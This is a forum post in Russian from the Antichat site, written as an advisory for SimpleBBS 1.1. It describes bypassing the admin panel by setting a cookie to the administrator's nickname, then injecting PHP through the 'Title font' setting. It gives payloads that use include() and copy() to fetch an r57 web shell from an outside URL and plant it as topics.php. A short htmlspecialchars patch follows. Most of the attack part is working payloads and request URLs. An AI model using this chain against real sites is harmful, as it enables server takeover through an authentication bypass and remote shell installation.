Форум АНТИЧАТ - SimpleBBS 1.1 PHP code execution

SimpleBBS 1.1 PHP code execution

30.12.2006, 14:51

_Great_

Флудер

Регистрация: 27.12.2005

Сообщений: 2,372

Провел на форуме:
5339610

Репутация: 4360

Отправить сообщение для _Great_ с помощью ICQ

SimpleBBS 1.1 PHP code execution

Продукт: SimpleBBS 1.1
Уязвимость: Выполнение произвольного PHP-кода
Опасность: Критическая

Описание
Выполнение PHP кода найдено в скрипте администрирования форума SimpleBBS.
В параметре "Title font" в панели администратора можно ввести php-код в виде:

Код:

phpinfo();die;/*

который будет выполнен при прямом обращении к скрипту data/options.php
Чтобы получить доступ к панели администрирования достаточно установить cookie с именем SbbCookie и значением - ником администратора. Ник администратора можно получить со страницы пользователей.
Для получения шелла потребуется код:

Код:

include($_GET[c]);die;/*

Обращаться - data/options.php?c=http://www.site.com/r57shell.txt
или

Код:

copy($_GET[a],$_GET[ b]);die;/*

Обращаться - data/options.php?a=http://www.site.com/r57shell.txt&b=topics.php и шелл будет скопирован в topics.php.

Защита
Предлагается фильтровать параметр ylarivifont следующим кодом.
includes/adminjee3.php
Было:

PHP код:


		
			
$tallennus = fopen("data/options.php", "w");

flock ($tallennus,2);

fwrite($tallennus, "<?php

// TITLE FONT, FONTSIZE, FONTCOLOR, BGCOLOR

$ylarivifont

Заменить на:

PHP код:


		
			
$tallennus = fopen("data/options.php", "w");

flock ($tallennus,2);

$ylarivifont = htmlspecialchars($ylarivifont);

fwrite($tallennus, "<?php

// TITLE FONT, FONTSIZE, FONTCOLOR, BGCOLOR

$ylarivifont

Author: Great